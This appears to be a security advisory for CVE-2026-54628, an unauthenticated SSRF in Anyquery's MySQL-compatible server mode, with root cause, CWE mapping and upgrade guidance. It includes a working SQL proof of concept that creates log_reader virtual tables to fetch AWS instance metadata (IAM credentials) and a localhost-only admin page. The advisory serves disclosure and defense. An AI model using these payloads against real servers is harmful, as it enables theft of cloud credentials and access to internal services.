CVE-2026-54628: Anyquery SSRF via Unrestricted SQLite Virtual Table Modules in Server Mode
Anyquery's MySQL-compatible server mode lets unauthenticated remote clients create SQLite virtual tables that fetch any URL, including cloud metadata endpoints and internal services, leaking credentia
The problem
When Anyquery runs in server mode (`anyquery server`), it binds a MySQL-protocol TCP port and accepts connections with no authentication by default. Any connected client can execute `CREATE VIRTUAL TABLE ... USING log_reader(...)` or `json_reader(...)`, causing the server process to issue outbound HTTP requests to attacker-supplied URLs.
No access control exists to block requests to loopback, RFC-1918, or link-local addresses. On cloud hosts this lets an attacker hit `http://169.254.169.254/` directly, retrieving IAM tokens and instance metadata. The scope is changed (C:H, S:C in the CVSS vector) because the server acts as a confused deputy on behalf of the attacker.
Proof of concept
A working proof-of-concept for CVE-2026-54628 in github.com/julien040/anyquery, with the exact payload below.
-- Connect unauthenticated to the exposed server:
-- mysql -u root -h <VICTIM_IP> -P 8070
-- Payload 1: steal AWS IAM credentials via IMDSv1
CREATE VIRTUAL TABLE aws_meta USING log_reader('http://169.254.169.254/latest/meta-data/');
SELECT * FROM aws_meta;
-- Payload 2: reach a localhost-only admin interface
CREATE VIRTUAL TABLE local_admin USING log_reader('http://localhost:8000/admin');
SELECT * FROM local_admin LIMIT 10;The `log_reader` and `json_reader` virtual table modules pass the constructor argument directly to `go-getter` (or the equivalent HTTP fetching layer) with no URL validation. Because SQLite virtual table constructors run synchronously during the `CREATE VIRTUAL TABLE` statement, the server process issues the HTTP request before returning a result to the client.
The patch in 0.4.5 adds an IP/hostname blocklist checked before any outbound fetch is performed in server mode. Private ranges (127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) and the link-local metadata address (169.254.169.254) are now rejected with an error.
The root cause maps to CWE-918 (SSRF), CWE-441 (Confused Deputy), and CWE-862 (Missing Authorization) because there was no server-mode gate on which virtual table sources were allowed.
The fix
Upgrade to anyquery >= 0.4.5. The release blocks outbound HTTP fetches to loopback, private, and link-local ranges when running in server mode. If you cannot upgrade immediately, do not expose `anyquery server` on a publicly reachable interface, place it behind a firewall rule that restricts client IPs, and configure your cloud instance to use IMDSv2 (which requires a session-oriented token and resists naive SSRF).
Related research
- high · 7.5CVE-2026-54629CVE-2026-54629: Anyquery Local File Read via Unrestricted SQLite Virtual Table Modules
- critical · 9.1CVE-2026-50006CVE-2026-50006: Anyquery Arbitrary File Write via Unrestricted ATTACH DATABASE in Server Mode
- high · 7.7nebula-mesh: Non-Admin SSRF via Unguarded allow_private Webhook Flag
- high · 7.7CVE-2026-49821CVE-2026-49821: Fission Package Cross-Namespace Confused Deputy RCE and SA Token Exfiltration